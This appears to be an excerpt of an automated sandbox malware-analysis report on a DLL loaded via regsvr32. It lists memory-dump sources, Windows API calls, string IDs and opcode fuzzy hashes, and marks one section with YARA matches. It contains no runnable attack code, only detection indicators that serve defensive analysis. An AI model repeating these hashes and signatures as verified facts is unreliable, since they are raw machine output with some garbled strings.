                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EncodePointer$_initp_misc_winsig
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 190222155-0
                                                                                                                                                • Opcode ID: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                                                                                                • Instruction ID: 0f2ed8e884fe95bf518accbde7fd7e9d0c3fcc6e386785ea31fa0d2eda8650fe
                                                                                                                                                • Opcode Fuzzy Hash: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                                                                                                • Instruction Fuzzy Hash: F7F09210E8D26BC0EC18FB63287A0B813401F96B88F592834E80E0A393DD2CE581C374
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heap$CreateInformation
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1774340351-0
                                                                                                                                                • Opcode ID: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                                                                                                • Instruction ID: 85cc39ddd20b28d4e43da1bcd66da92681fb55486460c9e5a5d5c6d01fcd0e5f
                                                                                                                                                • Opcode Fuzzy Hash: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                                                                                                • Instruction Fuzzy Hash: 9BE04FB5F297A1C2E799DB22E8297656390FF99344F90A839EB4E02794DF3CD045CB10
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00007FFC672034AF,?,?,?,00007FFC672021CB), ref: 00007FFC6720740D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2118026453-0
                                                                                                                                                • Opcode ID: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                                                                                                • Instruction ID: 338cd767fec27b350f621300f6ad7dd41a43a8f82d4a299b143cfa0310a47c2b
                                                                                                                                                • Opcode Fuzzy Hash: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                                                                                                • Instruction Fuzzy Hash: E4D05B32F5C655C1DF148B22F5A416C23A4EF84798F58C031D65C07745DD3CC496C720
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • Sleep.KERNEL32(?,?,0000000A,00007FFC67202DA3,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720314D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Sleep_errno
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1068366078-0
                                                                                                                                                • Opcode ID: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                                                                                                • Instruction ID: 6e3901fc6abe059b7c4403ac97311ee68a6b028d7a6cfff1a2308d9398c229c4
                                                                                                                                                • Opcode Fuzzy Hash: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                                                                                                • Instruction Fuzzy Hash: 5E01A222B28BA9C6EA448B17E864029B7A1FF88FD4F081535EF5D03B51DF39E891C710
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00007FFC67206C34: _FF_MSGBANNER.LIBCMT ref: 00007FFC67206C64
                                                                                                                                                  • Part of subcall function 00007FFC67206C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC672030C0,?,?,00000000,00007FFC67206B19,?,?,00000000,00007FFC67206BC3), ref: 00007FFC67206C89
                                                                                                                                                  • Part of subcall function 00007FFC67206C34: _errno.LIBCMT ref: 00007FFC67206CAD
                                                                                                                                                  • Part of subcall function 00007FFC67206C34: _errno.LIBCMT ref: 00007FFC67206CB8
                                                                                                                                                • Sleep.KERNEL32(?,?,00000000,00007FFC67206B19,?,?,00000000,00007FFC67206BC3,?,?,?,?,?,?,00000000,00007FFC67202DC8), ref: 00007FFC672030D2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _errno$AllocateHeapSleep
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4153772858-0
                                                                                                                                                • Opcode ID: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                                                                                                • Instruction ID: e53655927dc9d6eb10ffd539a69eb8981fddb6d8b5580df9b1ed71e31578b113
                                                                                                                                                • Opcode Fuzzy Hash: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                                                                                                • Instruction Fuzzy Hash: DDF0FF32A0D699C6EA009B23E06002973A1FF84B94F480538EA5D03B52DF3DE892C710
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$free$ByteCharMultiWide$ErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1446610345-0
                                                                                                                                                • Opcode ID: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                                                                                                • Instruction ID: e29c06c3d9affe1cb9874b95974d86482425fe2ccf914751977bcec80def537f
                                                                                                                                                • Opcode Fuzzy Hash: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                                                                                                • Instruction Fuzzy Hash: DBF1C232A0C6A9CAE7248F2694641BA77E1FF4479CF144A35EA5D47B94DF3CE940C720
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DecodeErrorLastPointer_errno$AddressLibraryLoadProc
                                                                                                                                                • String ID: ADVAPI32.DLL$SystemFunction036
                                                                                                                                                • API String ID: 1558914745-1064046199
                                                                                                                                                • Opcode ID: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                                                                                                • Instruction ID: 64d3d6b6e0ab2114531191481ec21cca632fa9be0b5e849cf0c9b805b2dcb963
                                                                                                                                                • Opcode Fuzzy Hash: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                                                                                                • Instruction Fuzzy Hash: D1316E65B0C66AC6FB14EB67A86927923D0AF89798F144C34EA0D47792EE3CE544C630
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
                                                                                                                                                • String ID: Norwegian-Nynorsk
                                                                                                                                                • API String ID: 2273835618-461349085
                                                                                                                                                • Opcode ID: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                                                                                                • Instruction ID: ad5a468f9c255d94c2668f73cc4a9e61135db196cbec5f332ad3f45090f32d0f
                                                                                                                                                • Opcode Fuzzy Hash: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                                                                                                • Instruction Fuzzy Hash: E96160A2A0C66AC6FB659F22D4683B92790FF45F48F084A35DA4D462D5DF7CE980C334
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FormatTime$__ascii_stricmpfree
                                                                                                                                                • String ID: a/p$am/pm
                                                                                                                                                • API String ID: 2252689280-3206640213
                                                                                                                                                • Opcode ID: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                                                                                                • Instruction ID: 82ff2bf32209b3681f7d0bb44ef2c8f8502ee3f1447a8e13f735aff0a09191f9
                                                                                                                                                • Opcode Fuzzy Hash: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                                                                                                • Instruction Fuzzy Hash: F8F1032691C6BAC6E7758F26887C17C67A1FF0478CF449836EA9D43A85CE3CA854C331
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFC67207194,?,?,?,?,00007FFC67206C69,?,?,00000000,00007FFC672030C0), ref: 00007FFC67206FCF
                                                                                                                                                • GetStdHandle.KERNEL32(?,?,?,?,?,00007FFC67207194,?,?,?,?,00007FFC67206C69,?,?,00000000,00007FFC672030C0), ref: 00007FFC672070DB
                                                                                                                                                • WriteFile.KERNEL32 ref: 00007FFC67207115
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$HandleModuleNameWrite
                                                                                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                • API String ID: 3784150691-4022980321
                                                                                                                                                • Opcode ID: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                                                                                                • Instruction ID: fc4e3c4448244111ef26b07103990be644f3ea7aece92676bcf4129f8e04d64d
                                                                                                                                                • Opcode Fuzzy Hash: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                                                                                                • Instruction Fuzzy Hash: 9751CF61B0C66BC2FB20D727A9797BA5351BF85398F404A36EE0D46AD6DE2CE145C230
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3778485334-0
                                                                                                                                                • Opcode ID: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                                                                                                • Instruction ID: 835de6b9e652350efb2490cfc6edece73ba395b1f6558e5f85fab940c80424bf
                                                                                                                                                • Opcode Fuzzy Hash: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                                                                                                • Instruction Fuzzy Hash: 8331E375A0CB6AC5EB50DB12F86436A73A4FF85348F500936EA8D42B64EF7CE048C720
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _lock.LIBCMT ref: 00007FFC6720E6EB
                                                                                                                                                • free.LIBCMT ref: 00007FFC6720E7E2
                                                                                                                                                  • Part of subcall function 00007FFC67203024: HeapFree.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720303A
                                                                                                                                                  • Part of subcall function 00007FFC67203024: _errno.LIBCMT ref: 00007FFC67203044
                                                                                                                                                  • Part of subcall function 00007FFC67203024: GetLastError.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720304C
                                                                                                                                                • ___lc_codepage_func.LIBCMT ref: 00007FFC6720E76B
                                                                                                                                                  • Part of subcall function 00007FFC67206550: RtlCaptureContext.KERNEL32 ref: 00007FFC6720658F
                                                                                                                                                  • Part of subcall function 00007FFC67206550: IsDebuggerPresent.KERNEL32 ref: 00007FFC6720662D
                                                                                                                                                  • Part of subcall function 00007FFC67206550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFC67206637
                                                                                                                                                  • Part of subcall function 00007FFC67206550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFC67206642
                                                                                                                                                  • Part of subcall function 00007FFC67206550: GetCurrentProcess.KERNEL32 ref: 00007FFC67206658
                                                                                                                                                  • Part of subcall function 00007FFC67206550: TerminateProcess.KERNEL32 ref: 00007FFC67206666
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentTerminate___lc_codepage_func_lockfree
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 178205154-0
                                                                                                                                                • Opcode ID: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                                                                                                • Instruction ID: 1d6b77440f4bd4b5836b34dca1301174c4171344e07ea53ff4c72e2ed7e8db77
                                                                                                                                                • Opcode Fuzzy Hash: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                                                                                                • Instruction Fuzzy Hash: ABD1D672E0C1AAC5E720AF26D47867A6B92BF85748F404935DA8D13795DF3CE891C730
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC6720E1C2), ref: 00007FFC6720DFF2
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC6720E1C2), ref: 00007FFC6720E004
                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC6720E1C2), ref: 00007FFC6720E04F
                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC6720E1C2), ref: 00007FFC6720E0E1
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC6720E1C2), ref: 00007FFC6720E11B
                                                                                                                                                • free.LIBCMT ref: 00007FFC6720E12F
                                                                                                                                                  • Part of subcall function 00007FFC67206C34: _FF_MSGBANNER.LIBCMT ref: 00007FFC67206C64
                                                                                                                                                  • Part of subcall function 00007FFC67206C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC672030C0,?,?,00000000,00007FFC67206B19,?,?,00000000,00007FFC67206BC3), ref: 00007FFC67206C89
                                                                                                                                                  • Part of subcall function 00007FFC67206C34: _errno.LIBCMT ref: 00007FFC67206CAD
                                                                                                                                                  • Part of subcall function 00007FFC67206C34: _errno.LIBCMT ref: 00007FFC67206CB8
                                                                                                                                                • GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC6720E1C2), ref: 00007FFC6720E145
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoLocale$_errno$AllocateByteCharErrorHeapLastMultiWidefree
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2309262205-0
                                                                                                                                                • Opcode ID: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                                                                                                • Instruction ID: 31d3b9a99d2f9d17f5d0be31e920eb8fc45f0da1e123992f7c68c0157eb8c139
                                                                                                                                                • Opcode Fuzzy Hash: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                                                                                                • Instruction Fuzzy Hash: F2518232E0C66AC6E760AF2298685696392FF447ACF541935EB1D13B94CF7DE984C320
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _errno$DecodePointer_lock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2175075375-0
                                                                                                                                                • Opcode ID: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                                                                                                • Instruction ID: 24833381d88700180ea52a012ec443f7f32ebf970a13d9e4948fed2cfa7c52eb
                                                                                                                                                • Opcode Fuzzy Hash: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                                                                                                • Instruction Fuzzy Hash: 80315222A1C76AC2FB15AA63957977B6391AF84788F044834DF0C4BB86EF2CD451C734
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1269745586-0
                                                                                                                                                • Opcode ID: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                                                                                                • Instruction ID: 640e0f853e4395b2a7cfee7997b7bf3c6d962e7f70c4b1e29c67b687c7e87d12
                                                                                                                                                • Opcode Fuzzy Hash: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                                                                                                • Instruction Fuzzy Hash: 18313076A0CB96C2DA24CB55E4953ABB3A0FF95748F400535D78D43A59EF3CD189CB10
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                                                • API String ID: 0-2447245168
                                                                                                                                                • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                                • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
